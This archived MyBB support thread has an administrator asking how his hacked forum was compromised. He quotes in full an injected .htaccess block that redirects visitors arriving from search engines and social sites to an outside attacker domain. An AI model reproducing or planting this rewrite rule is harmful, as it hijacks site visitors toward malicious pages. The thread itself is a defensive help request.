MyBB Community Forums

MyBB Community Forums > Community Archive > Archived Forums > Archived Development and Support > MyBB 1.6 > 1.6 General Support > whatever you press an 'ok' message appears.
Full Version: whatever you press an 'ok' message appears.
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Pages: 1 2

Destroy666

2013-06-02, 02:22 PM
Follow this guidance: http://community.mybb.com/thread-110890.html
Not all steps are required (in your case you have to go through the whole 2 and maybe 1) but I recommend to read everything carefully.
Also check if you use any vulnerable plugins and deinstall/update them: http://community.mybb.com/thread-133659.html

Dav

2013-06-03, 07:32 PM
Hello all thanks for the helps,

I'm the administrator for the site and I have:

1. disabled all plugins - nothing
2. searched for that screwattack url link in all of my forum files w/ notepad++ and found nothing
3. found no strange lines in code
4. I did file verification check and it said almost all of the files were modified...

The most recent thing I did was a month ago I updated mybb from 1.6.6 to 1.6.10 and it seemed to have worked fine since then.

I am wondering if I have to see if they injected or modified code in the database side of mybb?

edit: also where do I find the header and footer?

Thanks
Upon further searching I found the offending file:

It's the .htaccess file under the main www directory.

Here is its contents
Quote:#0c0896#
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ http://screwaholic.com/savas_mazlum/count.php [R=301,L]
</IfModule>

#/0c0896#

# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

# END WordPress

Any ideas on how they were able to edit this file to have the malicious redirects?

Thanks for all the helps!

Aphelion

2013-06-06, 08:13 AM
Any ideas? So we can be aware of this?

Thanks.

.m.

2013-06-06, 08:30 AM
^ server log should have the clue(s)

Aphelion

2013-06-06, 02:01 PM
Okay thanks in advance!
Pages: 1 2
MyBB Community Forums > Community Archive > Archived Forums > Archived Development and Support > MyBB 1.6 > 1.6 General Support > whatever you press an 'ok' message appears.